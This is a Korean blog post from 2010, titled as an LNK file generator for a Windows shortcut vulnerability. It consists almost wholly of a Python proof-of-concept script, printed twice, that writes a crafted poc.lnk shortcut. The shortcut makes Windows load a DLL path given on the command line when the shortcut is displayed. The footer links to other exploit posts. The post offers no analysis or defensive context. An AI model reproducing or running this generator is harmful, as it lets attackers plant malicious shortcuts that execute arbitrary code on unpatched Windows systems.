LNK 파일 생성기(Windows LNK Vulnerability)
vulnerability 2010. 7. 27. 11:30 |ex) test.py c:\dll.dll
import sys
def u(s):
lst = []
for ch in s:
ch = ch+"\x00"
lst.append(ch)
return reduce(lambda x,y:x+y, lst)
payload = "\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF2\x00\x14\x00\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30\x30\x9D\x14\x00\x2E\x00\x20\x20\xEC\x21\xEA\x3A\x69\x10\xA2\xDD\x08\x00\x2B\x30\x30\x9D\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6A\x00\x00\x00\x00\x00\x00\x1E\x00\x22\x00"
payload = payload + u(sys.argv[1])+ "\x00\x00\xDC\xC2\xA4\xC2\x5C\xD1\x00\x00\xF4\xCE\xE8\xD4\x30\xD1\x20\x00\xDC\xC2\xA4\xC2\x5C\xD1\xD0\xC5\x20\x00\x00\xB3\x5C\xD5\x20\x00\x15\xC8\xF4\xBC\x7C\xB9\x20\x00\xF4\xBC\xE0\xAC\x2C\x00\x20\x00\x58\xD5\xDC\xB4\xE8\xC6\xB4\xC5\x2C\x00\x20\x00\x31\xC1\xA5\xB2\x20\x00\x0F\xBC\x20\x00\x90\xC7\xD9\xB3\x20\x00\xC5\xC5\x70\xB3\x74\xC7\xB8\xD2\xD0\xC5\x20\x00\x00\xB3\x5C\xD5\x20\x00\x24\xC1\x15\xC8\x44\xC7\x20\x00\xC0\xBC\xBD\xAC\x69\xD5\xC8\xB2\xE4\xB2\x2E\x00\x00\x00\x00\x00\x00\x00\x00\x00"
fil = open("poc.lnk","w")
fil.write(payload)
fil.close()
import sys
def u(s):
lst = []
for ch in s:
ch = ch+"\x00"
lst.append(ch)
return reduce(lambda x,y:x+y, lst)
payload = "\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF2\x00\x14\x00\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30\x30\x9D\x14\x00\x2E\x00\x20\x20\xEC\x21\xEA\x3A\x69\x10\xA2\xDD\x08\x00\x2B\x30\x30\x9D\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6A\x00\x00\x00\x00\x00\x00\x1E\x00\x22\x00"
payload = payload + u(sys.argv[1])+ "\x00\x00\xDC\xC2\xA4\xC2\x5C\xD1\x00\x00\xF4\xCE\xE8\xD4\x30\xD1\x20\x00\xDC\xC2\xA4\xC2\x5C\xD1\xD0\xC5\x20\x00\x00\xB3\x5C\xD5\x20\x00\x15\xC8\xF4\xBC\x7C\xB9\x20\x00\xF4\xBC\xE0\xAC\x2C\x00\x20\x00\x58\xD5\xDC\xB4\xE8\xC6\xB4\xC5\x2C\x00\x20\x00\x31\xC1\xA5\xB2\x20\x00\x0F\xBC\x20\x00\x90\xC7\xD9\xB3\x20\x00\xC5\xC5\x70\xB3\x74\xC7\xB8\xD2\xD0\xC5\x20\x00\x00\xB3\x5C\xD5\x20\x00\x24\xC1\x15\xC8\x44\xC7\x20\x00\xC0\xBC\xBD\xAC\x69\xD5\xC8\xB2\xE4\xB2\x2E\x00\x00\x00\x00\x00\x00\x00\x00\x00"
fil = open("poc.lnk","w")
fil.write(payload)
fil.close()
'vulnerability' 카테고리의 다른 글
GOM Player 2.1.33.5071 exploit (0) | 2011.12.09 |
---|---|
CVE ID 받기 (0) | 2011.03.31 |
html file upload form (0) | 2010.06.24 |
Java Deployment Toolkit Test Page (0) | 2010.04.19 |
XE 1.4.0.10 XSS/CSRF 취약점 (0) | 2010.04.16 |